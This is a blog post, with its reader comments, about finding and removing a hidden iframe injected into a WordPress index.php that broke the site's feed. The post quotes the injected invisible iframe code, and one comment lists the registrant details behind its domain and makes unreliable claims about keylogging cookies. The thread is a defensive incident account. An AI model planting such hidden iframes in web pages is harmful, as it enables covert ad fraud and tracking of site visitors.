Hacked, Fixed, Email/Feed Issues Resolved
Good Grief 
I sent out an email to some of my readers this morning as I noticed my Feed Broadcaster was no longer working, and wanted to make sure it wasnt just on my end. It wasnt.
Thanks to everyone who responded, by the way – you guys are great! It was Patty Gale who offered an idea that lead to the solution, so I logged into FeedBurner to check things out…
It turns out my feed wouldnt “validate”. It even told me why, which I didnt really understand. But it did point out the piece of code causing the problem:
[iframe name="StatPage" src="http://banner-network.hk/ppc/index.php" width=5 height=5 style="display:none"][/iframe]
Hmmm. Now I know I didnt put that there 
Next Step: do a search on Google using a string of that code to see if anyone else is discussing it online anywhere. I chose |iframe name=”StatPage”| and pasted that into the search bar, which returned this topic on WordPress Support.
Scanning the discussion I see the word “hacked” ( 
– not good). Keep scanning and see the 5th message down, which says:
Check your main index.php file and see if it was modified.
I open my FTP program, log on to my hosting account, look in the root directory, and open the index.php file. Bingo! There it is…
I removed the code, saved the file, and went back to FeedBurner’s troubleshooting section. This time my feed validated (yay!).
In the case that something like this ever happens to you, these troubleshooting steps might come in handy. Dont panic. Just identify the problem, all of the possible sources of that problem, and search on Google for the solution.
Chances are, nothing will happen to you (or your sites) that hasnt already happened to someone else first 
To state the obvious, we’re back up and running again. So for those of you that were getting an error in Bloglines, in your feed reader, were missing the email notifications, etc… everything should be working just fine now.
Best,
Tags: hacked, hackers, wordpress, feed validator
Please share "Hacked, Fixed, Email/Feed Issues Resolved" with your friends using the buttons below. Thanks!
Oh brother. When will people get a life? What a hassle on your end…glad it is fixed, though.
I hear ya!
Unfortunately once everything was “fixed”, the email updates went out in a batch. I was worried that would happen. My apologies for the 3 emails in a row that everyone received tonight!
Follow me @lynnterry on Twitter.
That’s a bit scary, Lynn.
I didn’t get a chance to reply to your last email, but I thought it was strange that Feedburner was taking so long to validate the feed. Usually they update in just a few minutes after pinging.
I’m glad to see it’s resolved.
Follow me @pattygaledotcom on Twitter.
Thank you – and thanks again for the suggestions!
Follow me @lynnterry on Twitter.
At least you were able to figure it out and fix it. I would probably be at a total loss of figuring it out.
Soooo …
Someone was trying to run some sort a banner network file thru your site, it looks like.
Glad you have it resolved!
Rick Wilson
Follow me @corprebel on Twitter.
It would appear so – though it was invisible. How sneaky is that – racking up impressions to provide stats to paying advertisers
Follow me @lynnterry on Twitter.
Ack! Maybe you should have researched the code a little further to try to find out who was benefiting from it and reported them.
A good idea
Follow me @lynnterry on Twitter.
I’d noticed it was causing your blog pages to hang on load … it even happened during your Web conference yesterday (when you loaded one of your pages to point something out).
Didn’t realise the code was nefarious … glad you could sort it out.
I didnt even associate the two Andy… but you’re right – the mysterious error is gone, so that must have been the case. Thank goodness, because I’m not sure I would have known where to start tracking that down otherwise
Follow me @lynnterry on Twitter.
Hi Lynn,
here are some stats and info on that problem causer.
The domain the file is assoicated with running is registered with:
https://www.hkdnr.hk/
From HK (hong kong)
Their Account Name: HK1917076T
First name: TIM
Last name: FLOCK
Company Name: TIM FLOCK
DNS:
NS1.BANNER-NETWORK.HK
NS2.BANNER-NETWORK.HK
NS3.BANNER-NETWORK.HK
Chinese Holder:
john-lawson1956@doglover.com
Spoofed Registration:
21-06-2007
in this code:
[iframe name=â€StatPage†src=â€http://banner-network.hk/ppc/index.php†width=5 height=5 style=â€display:noneâ€][/iframe]
Iframe Name, is specifing a action from the file, index.php located in ppc/ directory
my guess is StatsPage is made to do two things, 1 track input types on the page this was inserted and 2 track results and cookie tracking. I highly recommend anyone who has resulted with this in their index file please clean your cookies, their can be a tracking (keylog) cookie in side this index.php file, I have (spoofed getting it) and found this out.
Glad to help out!.
and actually I had a rough attack from Japan, spoofing every address possible at webdevelopmenttechnology.com, I had over 300 messages send with out server, I blocked every single one. BUT, lol. if you aint’ got good money, it will be useless to report them, and try to sue or get them jailed. Japan, I even had the adress of the fart who done it. I just done some personaly justice, he won’t be doing it again.
Thank you, Chris! Appreciate the detective work there, and will certainly take your advice
Follow me @lynnterry on Twitter.
Lynn,
This is pretty serious, even though it was solved easily. Either your server was hacked, your WordPress install was hacked, or you have a worm or trojan on YOUR computer. Personally, I’d lay odds it’s one of the first two.
Use a decent search utility and scan your local files for the text used in the iframe. If it appears on your computer in a file, try to determine where the file came from. This will give a clue as to whether you received the file with the iframe in it, or if it was modified after it hit your computer. Regardless of what you find, I would do a full system scan with a GOOD antivirus/spyware scanner, and sooner rather than later.
Change your admin password for WordPress, and back up your database. It wouldn’t hurt to change your database access password either (you’ll have to update the configuration files for whatever scripts you have that access the db).
Ask your hosting company for assistance. They may be able to help you determine when/where/how the changes in the file were made.
Thank you, Steve – I have already changed passwords in many of those locations and am tracking down each FTP account I set up for assistants etc at the moment too.
I just bought a new computer, arrived this morning, so I am going scan this one, THEN do backups, then reload the O/S to a fresh install, and set up on the new box…
Follow me @lynnterry on Twitter.
Nice for sharing and I will take notice.
I’m having big problems at my yahoo e-mail so I’m moving to gmail…Thank-you P.S. I had 7 years of important e-mails go up into the dust..